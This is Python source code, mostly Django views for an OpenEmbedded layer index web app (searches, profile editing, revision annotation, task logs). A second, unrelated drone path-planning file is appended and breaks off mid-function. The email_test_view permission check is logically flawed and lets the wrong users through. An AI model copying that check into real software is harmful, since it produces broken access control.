return qs.filter(user=self.request.user)
class MachineSearchView(ListView):
context_object_name = 'machine_list'
paginate_by = 50
def get_queryset(self):
_check_url_branch(self.kwargs)
if self.request.GET.get('search', ''):
query_string = self.request.GET.get('q', '')
else:
query_string = ""
init_qs = Machine.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
if query_string.strip():
entry_query = utils.string_to_query(query_string, ['name', 'description'])
return init_qs.filter(entry_query).order_by('name', 'layerbranch__layer')
else:
if 'q' in self.request.GET:
return init_qs.order_by('name', 'layerbranch__layer')
else:
# Be consistent with RecipeSearchView
return Machine.objects.none()
def get_context_data(self, **kwargs):
context = super(MachineSearchView, self).get_context_data(**kwargs)
context['search_keyword'] = self.request.GET.get('q', '')
context['url_branch'] = self.kwargs['branch']
context['this_url_name'] = resolve(self.request.path_info).url_name
return context
class UpdateListView(ListView):
context_object_name = "updates"
paginate_by = 50
def get_queryset(self):
return Update.objects.all().order_by('-started')
class UpdateDetailView(DetailView):
model = Update
def get_context_data(self, **kwargs):
context = super(UpdateDetailView, self).get_context_data(**kwargs)
update = self.get_object()
if update:
context['layerupdates'] = update.layerupdate_set.order_by('-started')
return context
class LayerUpdateDetailView(DetailView):
model = LayerUpdate
class DistroSearchView(ListView):
context_object_name = 'distro_list'
paginate_by = 50
def get_queryset(self):
_check_url_branch(self.kwargs)
if self.request.GET.get('search', ''):
query_string = self.request.GET.get('q', '')
else:
query_string = ""
init_qs = Distro.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
if query_string.strip():
entry_query = utils.string_to_query(query_string, ['name', 'description'])
return init_qs.filter(entry_query).order_by('name', 'layerbranch__layer')
if 'q' in self.request.GET:
return init_qs.order_by('name', 'layerbranch__layer')
# Be consistent with RecipeSearchView
return Distro.objects.none()
def get_context_data(self, **kwargs):
context = super(DistroSearchView, self).get_context_data(**kwargs)
context['search_keyword'] = self.request.GET.get('q', '')
context['url_branch'] = self.kwargs['branch']
context['this_url_name'] = resolve(self.request.path_info).url_name
return context
class ClassSearchView(ListView):
context_object_name = 'class_list'
paginate_by = 50
def get_queryset(self):
_check_url_branch(self.kwargs)
if self.request.GET.get('search', ''):
query_string = self.request.GET.get('q', '')
else:
query_string = ""
init_qs = BBClass.objects.filter(layerbranch__branch__name=self.kwargs['branch'])
if query_string.strip():
entry_query = utils.string_to_query(query_string, ['name'])
return init_qs.filter(entry_query).order_by('name', 'layerbranch__layer')
if 'q' in self.request.GET:
return init_qs.order_by('name', 'layerbranch__layer')
# Be consistent with RecipeSearchView
return BBClass.objects.none()
def get_context_data(self, **kwargs):
context = super(ClassSearchView, self).get_context_data(**kwargs)
context['search_keyword'] = self.request.GET.get('q', '')
context['url_branch'] = self.kwargs['branch']
context['this_url_name'] = resolve(self.request.path_info).url_name
return context
class HistoryListView(ListView):
context_object_name = "revisions"
paginate_by = 50
def get_queryset(self):
return Revision.objects.all().order_by('-date_created')
class EditProfileFormView(SuccessMessageMixin, UpdateView):
form_class = EditProfileForm
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
self.user = request.user
return super(EditProfileFormView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EditProfileFormView, self).get_context_data(**kwargs)
form = context['form']
# Prepare a list of fields with errors
# We do this so that if there's a problem with the captcha, that's the only error shown
# (since we have a username field, we want to make user enumeration difficult)
if 'captcha' in form.errors:
error_fields = ['captcha']
else:
error_fields = form.errors.keys()
context['error_fields'] = error_fields
context['return_url'] = self.get_success_url()
return context
def get_object(self, queryset=None):
return self.user
def form_valid(self, form):
self.object = form.save()
if'answer_1' in form.changed_data:
# If one security answer has changed, they all have. Delete current questions and add new ones.
# Don't throw an error if we are editing the super user and they don't have security questions yet.
try:
self.user.userprofile.securityquestionanswer_set.all().delete()
user = self.user.userprofile
except UserProfile.DoesNotExist:
user = UserProfile.objects.create(user=self.user)
security_question_1 = SecurityQuestion.objects.get(question=form.cleaned_data.get("security_question_1"))
security_question_2 = SecurityQuestion.objects.get(question=form.cleaned_data.get("security_question_2"))
security_question_3 = SecurityQuestion.objects.get(question=form.cleaned_data.get("security_question_3"))
answer_1 = form.cleaned_data.get("answer_1").replace(" ", "").lower()
answer_2 = form.cleaned_data.get("answer_2").replace(" ", "").lower()
answer_3 = form.cleaned_data.get("answer_3").replace(" ", "").lower()
# Answers are hashed using Django's password hashing function make_password()
SecurityQuestionAnswer.objects.create(user=user, security_question=security_question_1,
answer=make_password(answer_1))
SecurityQuestionAnswer.objects.create(user=user, security_question=security_question_2,
answer=make_password(answer_2))
SecurityQuestionAnswer.objects.create(user=user, security_question=security_question_3,
answer=make_password(answer_3))
if 'email' in form.changed_data:
# Take a copy of request.user as it is about to be invalidated by logout()
user = self.request.user
logout(self.request)
# Deactivate user and put through registration again
user.is_active = False
user.save()
view = RegistrationView()
view.request = self.request
view.send_activation_email(user)
return HttpResponseRedirect(reverse('reregister'))
return super(EditProfileFormView, self).form_valid(form)
def get_success_message(self, cleaned_data):
return "Profile saved successfully"
def get_success_url(self):
return self.request.GET.get('return_to', reverse('frontpage'))
@receiver(pre_save, sender=reversion.models.Version)
def annotate_revision_version(sender, instance, *args, **kwargs):
ignorefields = ['vcs_last_rev', 'vcs_last_fetch', 'vcs_last_commit', 'updated']
changelist = []
objclass = instance.content_type.model_class()
currentVersion = instance.field_dict
#FIXME modern django-reversion dropped the type field (argh!)
#if instance.type == reversion.models.VERSION_DELETE:
# changelist.append("Deleted %s: %s" % (modelmeta.verbose_name.lower(), instance.object_repr))
#else:
pastver = reversion.models.Version.objects.filter(content_type=instance.content_type, object_id=instance.object_id).order_by('-id').first()
if pastver:# and instance.type != reversion.models.VERSION_ADD:
pastVersion = pastver.field_dict
changes = set(currentVersion.items()) - set(pastVersion.items())
changedVars = [var[0] for var in changes]
fieldchanges = []
modelmeta = objclass._meta
for field in changedVars:
if field not in ignorefields:
modelfield = modelmeta.get_field(field)
newvalue = currentVersion[field]
if modelfield.choices:
for v in modelfield.choices:
if v[0] == newvalue:
newvalue = v[1]
break
fieldchanges.append("%s to '%s'" % (modelfield.verbose_name.lower(), newvalue))
if fieldchanges:
changelist.append("Changed %s %s %s" % (modelmeta.verbose_name.lower(), instance.object_repr, ", ".join(fieldchanges)))
if changelist:
if not instance.revision.comment or instance.revision.comment == 'No changes':
instance.revision.comment = '\n'.join(changelist)
else:
instance.revision.comment = instance.revision.comment + '\n' + ('\n'.join(changelist))
instance.revision.save()
@receiver(pre_save, sender=reversion.models.Revision)
def annotate_revision(sender, instance, *args, **kwargs):
if instance.pk is None:
# When you make changes in the admin site the comment gets set to just
# specify the field that was changed, but that's not enough detail.
# For changes elsewhere it'll be blank since we aren't creating a revision
# explicitly. Thus, set the comment to a default value and we'll fill it in
# ourselves using the Version pre-save signal handler above.
instance.comment = 'No changes'
class RecipeDetailView(DetailView):
model = Recipe
def get_context_data(self, **kwargs):
context = super(RecipeDetailView, self).get_context_data(**kwargs)
recipe = self.get_object()
if recipe:
verappendprefix = recipe.filename.split('.bb')[0]
appendprefix = verappendprefix.split('_')[0]
appendprefix = appendprefix.replace('+', r'\+')
#context['verappends'] = BBAppend.objects.filter(layerbranch__branch=recipe.layerbranch.branch).filter(filename='%s.bbappend' % verappendprefix)
context['appends'] = BBAppend.objects.filter(layerbranch__branch=recipe.layerbranch.branch).filter(filename__regex=r'^%s(_[^_]*)?\.bbappend' % appendprefix)
verappends = []
for append in context['appends']:
if append.matches_recipe(recipe):
verappends.append(append)
context['verappends'] = verappends
context['packageconfigs'] = recipe.packageconfig_set.order_by('feature')
context['staticdependencies'] = recipe.staticbuilddep_set.order_by('name')
extrafiles = []
for dep in recipe.recipefiledependency_set.all():
if dep.path.endswith('.inc'):
extrafiles.append(dep)
context['extrafiles'] = extrafiles
context['otherbranch_recipes'] = Recipe.objects.filter(layerbranch__layer=recipe.layerbranch.layer, layerbranch__branch__comparison=False, pn=recipe.pn).order_by('layerbranch__branch__sort_priority')
return context
class LinkWrapper:
def __init__(self, queryset):
self.queryset = queryset
def __iter__(self):
for obj in self.queryset:
self._annotate(obj)
yield obj
def _slice(self, start, stop, step=1):
for item in islice(self.queryset, start, stop, step):
self._annotate(item)
yield item
def __getitem__(self, key):
if isinstance(key, slice):
return self._slice(key.start, key.stop, key.step)
else:
return next(self._slice(key, key+1))
def __len__(self):
if isinstance(self.queryset, QuerySet):
return self.queryset.count()
else:
return len(self.queryset)
class ClassicRecipeLinkWrapper(LinkWrapper):
# This function is required by generic views, create another proxy
def _clone(self):
return ClassicRecipeLinkWrapper(self.queryset._clone(), **self.kwargs)
def _annotate(self, obj):
recipe = None
vercmp = 0
if obj.cover_layerbranch and obj.cover_pn:
rq = Recipe.objects.filter(layerbranch=obj.cover_layerbranch).filter(pn=obj.cover_pn)
if rq:
recipe = rq.first()
if obj.pv and recipe.pv:
obj_ver = parse_version(obj.pv)
recipe_ver = parse_version(recipe.pv)
vercmp = ((recipe_ver > obj_ver) - (recipe_ver < obj_ver))
setattr(obj, 'cover_recipe', recipe)
setattr(obj, 'cover_vercmp', vercmp)
class ClassicRecipeReverseLinkWrapper(LinkWrapper):
def __init__(self, queryset, branch, from_branch=None):
self.queryset = queryset
self.branch = branch
self.from_branch = from_branch
# This function is required by generic views, create another proxy
def _clone(self):
return ClassicRecipeReverseLinkWrapper(self.queryset._clone(), **self.kwargs)
def _annotate(self, obj):
recipe = None
vercmp = 0
if self.from_branch:
from_branchobj = LayerBranch.objects.get(layer=obj.layerbranch.layer, branch__name=self.from_branch)
else:
from_branchobj = obj.layerbranch
rq = ClassicRecipe.objects.filter(layerbranch__branch__name=self.branch).filter(cover_layerbranch=from_branchobj).filter(cover_pn=obj.pn)
if rq:
recipe = rq.first()
if obj.pv and recipe.pv:
obj_ver = parse_version(obj.pv)
recipe_ver = parse_version(recipe.pv)
vercmp = ((recipe_ver > obj_ver) - (recipe_ver < obj_ver))
setattr(obj, 'cover_recipe', recipe)
setattr(obj, 'cover_vercmp', vercmp)
class LayerCheckListView(ListView):
context_object_name = 'layerbranches'
def get_queryset(self):
_check_url_branch(self.kwargs)
return LayerBranch.objects.filter(branch__name=self.kwargs['branch']).filter(layer__status__in=['P', 'X']).order_by('layer__name')
class BBClassCheckListView(ListView):
context_object_name = 'classes'
def get_queryset(self):
_check_url_branch(self.kwargs)
nonrecipe_classes = ['archiver',
'base',
'buildhistory',
'bugzilla',
'buildstats',
'buildstats-summary',
'ccache',
'chrpath',
'copyleft_compliance',
'copyleft_filter',
'cve-check',
'debian',
'devshell',
'devtool-source',
'distrodata',
'extrausers',
'icecc',
'image-buildinfo',
'image-container',
'image-combined-dbg',
'image-live',
'image-mklibs',
'image-prelink',
'image_types',
'image_types_wic',
'insane',
'license',
'license_image',
'live-vm-common',
'logging',
'metadata_scm',
'migrate_localcount',
'mirrors',
'multilib',
'multilib_global',
'multilib_header',
'oelint',
'own-mirrors',
'package',
'package_deb',
'package_ipk',
'package_rpm',
'package_tar',
'packagedata',
'packagefeed-stability',
'patch',
'primport',
'prexport',
'recipe_sanity',
'remove-libtool',
'report-error',
'reproducible_build',
'reproducible_build_simple',
'rm_work',
'rm_work_and_downloads',
'rootfs-postcommands',
'rootfs_deb',
'rootfs_ipk',
'rootfs_rpm',
'rootfsdebugfiles',
'sanity',
'sign_ipk',
'sign_package_feed',
'sign_rpm',
'siteconfig',
'siteinfo',
'spdx',
'sstate',
'staging',
'syslinux',
'systemd-boot',
'terminal',
'testexport',
'testimage',
'testimage-auto',
'testsdk',
'tinderclient',
'toaster',
'toolchain-scripts',
'toolchain-scripts-base',
'uninative',
'useradd-staticids',
'utility-tasks',
'utils',
]
return BBClass.objects.filter(layerbranch__branch__name=self.kwargs['branch']).filter(layerbranch__layer__name=settings.CORE_LAYER_NAME).exclude(name__in=nonrecipe_classes).order_by('name')
class ClassicRecipeSearchView(RecipeSearchView):
def render_to_response(self, context, **kwargs):
# Bypass the redirect-to-single-instance behaviour of RecipeSearchView
return super(ListView, self).render_to_response(context, **kwargs)
def get_queryset(self):
self.kwargs['branch'] = self.kwargs.get('branch', 'oe-classic')
query_string = self.request.GET.get('q', '')
cover_status = self.request.GET.get('cover_status', None)
cover_verified = self.request.GET.get('cover_verified', None)
category = self.request.GET.get('category', None)
selectedlayers_param = self.request.GET.get('selectedlayers', '')
if selectedlayers_param:
layer_ids = [int(i) for i in selectedlayers_param.split(',')]
else:
layer_ids = []
has_patches = self.request.GET.get('has_patches', '')
needs_attention = self.request.GET.get('needs_attention', '')
qreversed = self.request.GET.get('reversed', '')
init_qs = ClassicRecipe.objects.filter(layerbranch__branch__name=self.kwargs['branch']).filter(deleted=False)
filtered = False
cover_null = False
if cover_status:
if cover_status == '!':
init_qs = init_qs.filter(cover_status__in=['U', 'N'])
elif cover_status == '#':
init_qs = init_qs.exclude(cover_status__in=['U', 'N', 'S'])
else:
init_qs = init_qs.filter(cover_status=cover_status)
filtered = True
if cover_status in ['U', '!']:
cover_null = True
if cover_verified:
init_qs = init_qs.filter(cover_verified=(cover_verified=='1'))
filtered = True
if category:
if category == "''" or category == '""':
init_qs = init_qs.filter(classic_category='')
else:
init_qs = init_qs.filter(classic_category__icontains=category)
filtered = True
if layer_ids:
init_qs = init_qs.filter(cover_layerbranch__layer__in=layer_ids)
if has_patches.strip():
if has_patches == '1':
init_qs = init_qs.filter(patch__isnull=False).distinct()
else:
init_qs = init_qs.filter(patch__isnull=True)
filtered = True
if needs_attention.strip():
if needs_attention == '1':
init_qs = init_qs.filter(needs_attention=True)
else:
init_qs = init_qs.filter(needs_attention=False)
filtered = True
qs, filtered = self.search_recipe_query(init_qs, query_string, preferred=False)
if qreversed:
init_rqs = Recipe.objects.filter(layerbranch__branch__name='master')
if layer_ids:
init_rqs = init_rqs.filter(layerbranch__layer__id__in=layer_ids)
excludeclasses_param = self.request.GET.get('excludeclasses', '')
if excludeclasses_param:
for inherit in excludeclasses_param.split(','):
init_rqs = init_rqs.exclude(inherits=inherit).exclude(inherits__startswith=inherit + ' ').exclude(inherits__endswith=' ' + inherit).exclude(inherits__contains=' %s ' % inherit)
all_values = []
if filtered:
if isinstance(qs, list):
values = []
for item in qs:
if item.cover_layerbranch and item.cover_pn:
values.append((item.cover_layerbranch.id, item.cover_pn))
else:
values = qs.filter(cover_layerbranch__isnull=False).filter(cover_pn__isnull=False).values_list('cover_layerbranch__id', 'cover_pn').distinct()
if cover_null:
all_values = ClassicRecipe.objects.filter(layerbranch__branch__name=self.kwargs['branch']).filter(deleted=False).filter(cover_layerbranch__isnull=False).filter(cover_pn__isnull=False).values_list('cover_layerbranch__id', 'cover_pn').distinct()
else:
values = None
rqs = init_rqs.order_by(Lower('pn'), 'layerbranch__layer')
if filtered:
items = []
for item in rqs:
recipe_values = (item.layerbranch.id, item.pn)
if (cover_null and recipe_values not in all_values) or (recipe_values in values):
items.append(item)
return ClassicRecipeReverseLinkWrapper(items, self.kwargs['branch'])
return ClassicRecipeReverseLinkWrapper(rqs, self.kwargs['branch'])
else:
return ClassicRecipeLinkWrapper(qs)
def get_context_data(self, **kwargs):
context = super(ClassicRecipeSearchView, self).get_context_data(**kwargs)
context['this_url_name'] = 'recipe_search'
branchname = self.kwargs.get('branch', 'oe-classic')
context['branch'] = get_object_or_404(Branch, name=branchname)
if 'q' in self.request.GET:
searched = True
search_form = ClassicRecipeSearchForm(self.request.GET)
else:
searched = False
search_form = ClassicRecipeSearchForm()
context['compare'] = self.request.GET.get('compare', False)
context['reversed'] = self.request.GET.get('reversed', False)
context['search_form'] = search_form
context['searched'] = searched
selectedlayers_param = self.request.GET.get('selectedlayers', '')
if selectedlayers_param:
all_layer_names = dict(LayerItem.objects.all().values_list('id', 'name'))
layer_ids = [int(i) for i in selectedlayers_param.split(',')]
layer_names = [all_layer_names[i] for i in layer_ids]
context['selectedlayers_display'] = ','.join(layer_names)
else:
layer_ids = []
context['selectedlayers_display'] = ' (any)'
context['selectedlayers'] = layer_ids
excludeclasses_param = self.request.GET.get('excludeclasses', '')
if excludeclasses_param:
context['excludeclasses_display'] = excludeclasses_param
context['excludeclasses'] = excludeclasses_param.split(',')
else:
context['excludeclasses_display'] = ' (none)'
context['excludeclasses'] = []
context['updateable'] = False
if self.request.user.has_perm('layerindex.update_comparison_branch'):
for item in getattr(settings, 'COMPARISON_UPDATE', []):
if item['branch_name'] == context['branch'].name:
context['updateable'] = True
break
return context
class ClassicRecipeDetailView(SuccessMessageMixin, DetailView):
model = ClassicRecipe
context_object_name = 'recipe'
def _can_edit(self):
if self.request.user.is_authenticated():
if not self.request.user.has_perm('layerindex.edit_classic'):
return False
else:
return False
return True
def _can_disposition_patches(self):
if self.request.user.is_authenticated():
if not self.request.user.has_perm('layerindex.patch_disposition'):
return False
else:
return False
return True
def get_context_data(self, **kwargs):
context = super(ClassicRecipeDetailView, self).get_context_data(**kwargs)
context['can_edit'] = self._can_edit()
recipe = context['recipe']
context['branch'] = recipe.layerbranch.branch
# Get covering recipe if any
cover_recipe = None
if recipe.cover_pn:
rq = Recipe.objects.filter(layerbranch=recipe.cover_layerbranch).filter(pn=recipe.cover_pn)
if rq:
cover_recipe = rq.first()
context['cover_recipe'] = cover_recipe
context['layerbranch_desc'] = str(recipe.layerbranch.branch)
context['to_desc'] = 'OpenEmbedded'
context['recipes'] = [recipe, cover_recipe]
context['can_disposition_patches'] = self._can_disposition_patches()
if context['can_disposition_patches']:
nodisposition_ids = list(recipe.patch_set.filter(patchdisposition__isnull=True).values_list('id', flat=True))
patch_initial = [{'patch': p} for p in nodisposition_ids]
patch_formset = PatchDispositionFormSet(queryset=PatchDisposition.objects.filter(patch__recipe=recipe), initial=patch_initial, prefix='patchdispositiondialog')
patch_formset.extra = len(patch_initial)
context['patch_formset'] = patch_formset
return context
def post(self, request, *args, **kwargs):
if not self._can_disposition_patches():
raise PermissionDenied
recipe = get_object_or_404(ClassicRecipe, pk=self.kwargs['pk'])
# What follows is a bit hacky, because we are receiving the form fields
# for just one of the forms in the formset which isn't really supported
# by Django
for field in request.POST:
if field.startswith('patchdispositiondialog'):
prefix = '-'.join(field.split('-')[:2])
instance = None
patchdisposition_id = request.POST.get('%s-id' % prefix, '')
if patchdisposition_id != '':
instance = get_object_or_404(PatchDisposition, pk=int(patchdisposition_id))
form = PatchDispositionForm(request.POST, prefix=prefix, instance=instance)
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
messages.success(request, 'Changes to patch %s saved successfully.' % instance.patch.src_path)
return HttpResponseRedirect(reverse('comparison_recipe', args=(recipe.id,)))
else:
# FIXME this is ugly because HTML gets escaped
messages.error(request, 'Failed to save changes: %s' % form.errors)
break
return self.get(request, *args, **kwargs)
class ClassicRecipeStatsView(TemplateView):
def get_context_data(self, **kwargs):
context = super(ClassicRecipeStatsView, self).get_context_data(**kwargs)
branchname = self.kwargs.get('branch', 'oe-classic')
context['branch'] = get_object_or_404(Branch, name=branchname)
context['url_branch'] = branchname
context['this_url_name'] = 'recipe_search'
# *** Cover status chart ***
recipes = ClassicRecipe.objects.filter(layerbranch__branch=context['branch']).filter(deleted=False)
statuses = []
status_counts = {}
for choice, desc in ClassicRecipe.COVER_STATUS_CHOICES:
count = recipes.filter(cover_status=choice).count()
if count > 0:
statuses.append(desc)
status_counts[desc] = count
statuses = sorted(statuses, key=lambda status: status_counts[status], reverse=True)
context['chart_status_labels'] = statuses
context['chart_status_values'] = [status_counts[status] for status in statuses]
# *** Categories chart ***
categories = ['obsoletedir', 'nonworkingdir']
uniquevals = recipes.exclude(classic_category='').values_list('classic_category', flat=True).distinct()
for value in uniquevals:
cats = value.split()
for cat in cats:
if not cat in categories:
categories.append(cat)
categories.append('none')
catcounts = dict.fromkeys(categories, 0)
unmigrated = recipes.filter(cover_status__in=['U', 'N'])
catcounts['none'] = unmigrated.filter(classic_category='').count()
values = unmigrated.exclude(classic_category='').values_list('classic_category', flat=True)
# We gather data this way because an item might be in more than one category, thus
# the categories list must be in priority order
for value in values:
recipecats = value.split()
foundcat = 'none'
for cat in categories:
if cat in recipecats:
foundcat = cat
break
catcounts[foundcat] += 1
# Eliminate categories with zero count
categories = [cat for cat in categories if catcounts[cat] > 0]
categories = sorted(categories, key=lambda cat: catcounts[cat], reverse=True)
context['chart_category_labels'] = categories
context['chart_category_values'] = [catcounts[k] for k in categories]
return context
class StatsView(TemplateView):
def get_context_data(self, **kwargs):
context = super(StatsView, self).get_context_data(**kwargs)
context['layercount'] = LayerItem.objects.count()
context['recipe_count_distinct'] = Recipe.objects.values('pn').distinct().count()
context['class_count_distinct'] = BBClass.objects.values('name').distinct().count()
context['machine_count_distinct'] = Machine.objects.values('name').distinct().count()
context['distro_count_distinct'] = Distro.objects.values('name').distinct().count()
context['perbranch'] = Branch.objects.filter(hidden=False).order_by('sort_priority').annotate(
layer_count=Count('layerbranch', distinct=True),
recipe_count=Count('layerbranch__recipe', distinct=True),
class_count=Count('layerbranch__bbclass', distinct=True),
machine_count=Count('layerbranch__machine', distinct=True),
distro_count=Count('layerbranch__distro', distinct=True))
return context
def layer_export_recipes_csv_view(request, branch, slug):
import csv
layer = get_object_or_404(LayerItem, name=slug)
layerbranch = layer.get_layerbranch(branch)
if not layerbranch:
raise Http404
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="recipes_%s_%s.csv"' % (layer.name, layerbranch.branch.name)
fieldlist = request.GET.get('fields', 'pn,pv,license').split(',')
recipe_fields = [f.name for f in Recipe._meta.get_fields() if not (f.auto_created and f.is_relation)]
for field in fieldlist:
if field not in recipe_fields:
return HttpResponse('Field %s is invalid' % field)
writer = csv.writer(response)
for recipe in layerbranch.sorted_recipes():
values = [getattr(recipe, field) for field in fieldlist]
writer.writerow(values)
return response
def comparison_update_view(request, branch):
branchobj = get_object_or_404(Branch, name=branch)
if not branchobj.comparison:
raise Http404
if not request.user.has_perm('layerindex.update_comparison_branch'):
raise PermissionDenied
from celery import uuid
cmd = None
for item in getattr(settings, 'COMPARISON_UPDATE', []):
if item['branch_name'] == branchobj.name:
cmd = item['update_command']
break
if not cmd:
raise Exception('No update command defined for branch %s' % branch)
task_id = uuid()
# Create this here first, because inside the task we don't have all of the required info
update = Update(task_id=task_id)
update.started = datetime.now()
update.triggered_by = request.user
update.save()
res = tasks.run_update_command.apply_async((branch, cmd), task_id=task_id)
return HttpResponseRedirect(reverse_lazy('task_status', kwargs={'task_id': task_id}))
class TaskStatusView(TemplateView):
def get_context_data(self, **kwargs):
from celery.result import AsyncResult
context = super(TaskStatusView, self).get_context_data(**kwargs)
task_id = self.kwargs['task_id']
context['task_id'] = task_id
context['result'] = AsyncResult(task_id)
context['update'] = get_object_or_404(Update, task_id=task_id)
context['log_url'] = reverse_lazy('task_log', args=(task_id,))
return context
def task_log_view(request, task_id):
from celery.result import AsyncResult
if not request.user.is_authenticated():
raise PermissionDenied
if '/' in task_id:
# Block anything that looks like a path
raise Http404
result = AsyncResult(task_id)
start = int(request.GET.get('start', 0))
try:
f = open(os.path.join(settings.TASK_LOG_DIR, 'task_%s.log' % task_id), 'rb')
except FileNotFoundError:
raise Http404
try:
f.seek(start)
datastr = f.read()
origlen = len(datastr)
# Squash out CRs *within* the string (CRs at the start preserved)
datastr = utils.squash_crs(datastr)
# We need to escape this or else things that look like tags in the output
# will be interpreted as such by the browser
data = escape(datastr)
response = HttpResponse(data)
try:
ready = result.ready()
except ConnectionResetError:
# FIXME this shouldn't be happening so often, but ultimately we don't care -
# the frontend is polling so it'll likely succeed in a subsequent request
ready = False
if ready:
response['Task-Done'] = '1'
updateobj = get_object_or_404(Update, task_id=task_id)
response['Task-Duration'] = utils.timesince2(updateobj.started, updateobj.finished)
response['Task-Progress'] = 100
if result.info:
if isinstance(result.info, dict):
response['Task-Result'] = result.info.get('retcode', None)
else:
response['Task-Result'] = -96
else:
response['Task-Done'] = '0'
preader = utils.ProgressReader(settings.TASK_LOG_DIR, task_id)
response['Task-Progress'] = preader.read()
response['Task-Log-Position'] = start + origlen
finally:
f.close()
return response
def task_stop_view(request, task_id):
from celery.result import AsyncResult
import signal
if not request.user.is_authenticated():
raise PermissionDenied
result = AsyncResult(task_id)
result.revoke(terminate=True, signal=signal.SIGUSR2)
return HttpResponse('terminated')
def email_test_view(request):
if not request.user.is_authenticated() and request.user.is_staff():
raise PermissionDenied
plaintext = get_template('layerindex/testemail.txt')
if request.user.first_name:
user_name = request.user.first_name
else:
user_name = request.user.username
site = Site.objects.get_current()
if site:
site_name = site.name
else:
site_name = 'OE Layer Index'
d = {
'user_name': user_name,
'site_name': site_name,
'site_host': request.META['HTTP_HOST'],
'help_contact': _get_help_contact(),
}
subject = '%s: test email' % site_name
from_email = settings.SUBMIT_EMAIL_FROM
to_email = request.user.email
text_content = plaintext.render(d)
tasks.send_email.apply_async((subject, text_content, from_email, [to_email]))
return HttpResponse('Test email sent to %s' % to_email)
class ComparisonRecipeSelectView(ClassicRecipeSearchView):
def _can_edit(self):
if self.request.user.is_authenticated():
if not self.request.user.has_perm('layerindex.edit_classic'):
return False
else:
return False
return True
def get_context_data(self, **kwargs):
self.kwargs['branch'] = 'master'
context = super(ComparisonRecipeSelectView, self).get_context_data(**kwargs)
recipe = get_object_or_404(ClassicRecipe, pk=self.kwargs['pk'])
context['select_for'] = recipe
context['existing_cover_recipe'] = recipe.get_cover_recipe()
comparison_form = ClassicRecipeForm(prefix='selectrecipedialog', instance=recipe)
comparison_form.fields['cover_pn'].widget = forms.HiddenInput()
comparison_form.fields['cover_layerbranch'].widget = forms.HiddenInput()
context['comparison_form'] = comparison_form
if 'q' in self.request.GET:
search_form = ComparisonRecipeSelectForm(self.request.GET)
else:
search_form = ComparisonRecipeSelectForm()
context['search_form'] = search_form
context['can_edit'] = self._can_edit()
return context
def get_queryset(self):
query_string = self.request.GET.get('q', '')
selectedlayers_param = self.request.GET.get('selectedlayers', '')
if selectedlayers_param:
layer_ids = [int(i) for i in selectedlayers_param.split(',')]
else:
layer_ids = []
init_qs = Recipe.objects.filter(layerbranch__branch__name='master')
if layer_ids:
init_qs = init_qs.filter(layerbranch__layer__in=layer_ids)
qs, _ = self.search_recipe_query(init_qs, query_string, preferred=False)
return qs
def post(self, request, *args, **kwargs):
if not self._can_edit():
raise PermissionDenied
recipe = get_object_or_404(ClassicRecipe, pk=self.kwargs['pk'])
form = ClassicRecipeForm(request.POST, prefix='selectrecipedialog', instance=recipe)
if form.is_valid():
form.save()
messages.success(request, 'Changes to comparison recipe %s saved successfully.' % recipe.pn)
return HttpResponseRedirect(reverse('comparison_recipe', args=(recipe.id,)))
else:
# FIXME this is ugly because HTML gets escaped
messages.error(request, 'Failed to save changes: %s' % form.errors)
return self.get(request, *args, **kwargs)
class ComparisonRecipeSelectDetailView(DetailView):
model = Recipe
def get_context_data(self, **kwargs):
context = super(ComparisonRecipeSelectDetailView, self).get_context_data(**kwargs)
recipe = get_object_or_404(ClassicRecipe, pk=self.kwargs['selectfor'])
context['select_for'] = recipe
context['existing_cover_recipe'] = recipe.get_cover_recipe()
comparison_form = ClassicRecipeForm(prefix='selectrecipedialog', instance=recipe)
comparison_form.fields['cover_pn'].widget = forms.HiddenInput()
comparison_form.fields['cover_layerbranch'].widget = forms.HiddenInput()
context['comparison_form'] = comparison_form
context['can_edit'] = False
return context
def post(self, request, *args, **kwargs):
if not request.user.is_authenticated():
raise PermissionDenied
recipe = get_object_or_404(ClassicRecipe, pk=self.kwargs['selectfor'])
form = ClassicRecipeForm(request.POST, prefix='selectrecipedialog', instance=recipe)
if form.is_valid():
form.save()
messages.success(request, 'Changes to comparison recipe %s saved successfully.' % recipe.pn)
return HttpResponseRedirect(reverse('comparison_recipe', args=(recipe.id,)))
else:
# FIXME this is ugly because HTML gets escaped
messages.error(request, 'Failed to save changes: %s' % form.errors)
return self.get(request, *args, **kwargs)
|
<gh_stars>0
'''
Any questions ask Mikkel
'''
import os
import math
import csv
import numpy as np
import matplotlib.pyplot as plt
from shapely.geometry.polygon import LinearRing
from scipy.spatial.distance import cdist
from utm import utmconv
import pandas as pd
class Pathplanclass():
def __init__(self):
#plotting data
self.plotData = True
self.plan_file = "/outside_fence_wed.plan"
self.csv_filename = '/fence_2m.csv'
self.uc = utmconv()
#FIELD OF VIEW OF CAMERA IN METERS
self.FIELD_OF_VIEW = 8
#OFFSET OF DRONE PATH FROM FENCE
self.FENCE_OFFSET = 2
self.basePath = os.path.dirname(os.path.abspath(__file__))
self.dirrec = ""
##### RUNNING THE SCIPTS #####
self.run_main(self.plan_file)
def get_fence_position(self,filename):
file_read = pd.read_json(self.basePath + filename, orient='columns')
fileLength = len(file_read['mission']['items'])
path_fence = []
uc = utmconv()
for i in range(1,fileLength): # Starts from item[1] because item[0] would be null
lon = file_read['mission']['items'][i]['params'][4]
lat = file_read['mission']['items'][i]['params'][5]
alt = file_read['mission']['items'][i]['params'][6]
if(alt == 0):
break
#print(lon, lat)
hemisphere, zone, letter, e, n = uc.geodetic_to_utm (lat,lon)
path_fence.append([e,n])
#FOR TESTING
# path_fence = ([[9,7],[8,9],[8,11],[9,12],[11,12],[11,11],[12,11],[12,10],[13,9],[13,8],[12,7],[9,7]])
#
return hemisphere, zone, letter, path_fence
def calculate_flight_path(self,path_fence):
poly_line = LinearRing(path_fence)
poly_line_offset_left = poly_line.parallel_offset(self.FENCE_OFFSET, side="left", resolution=16, join_style=2)
poly_line_offset_right = poly_line.parallel_offset(self.FENCE_OFFSET, side="right", resolution=16, join_style=2)
if (poly_line_offset_left.length > poly_line_offset_right.length):
poly_line_offset = poly_line_offset_right
self.dirrec = "CCW"
print("CCW")
else:
poly_line_offset = poly_line_offset_left
self.dirrec = "CW"
print("CW")
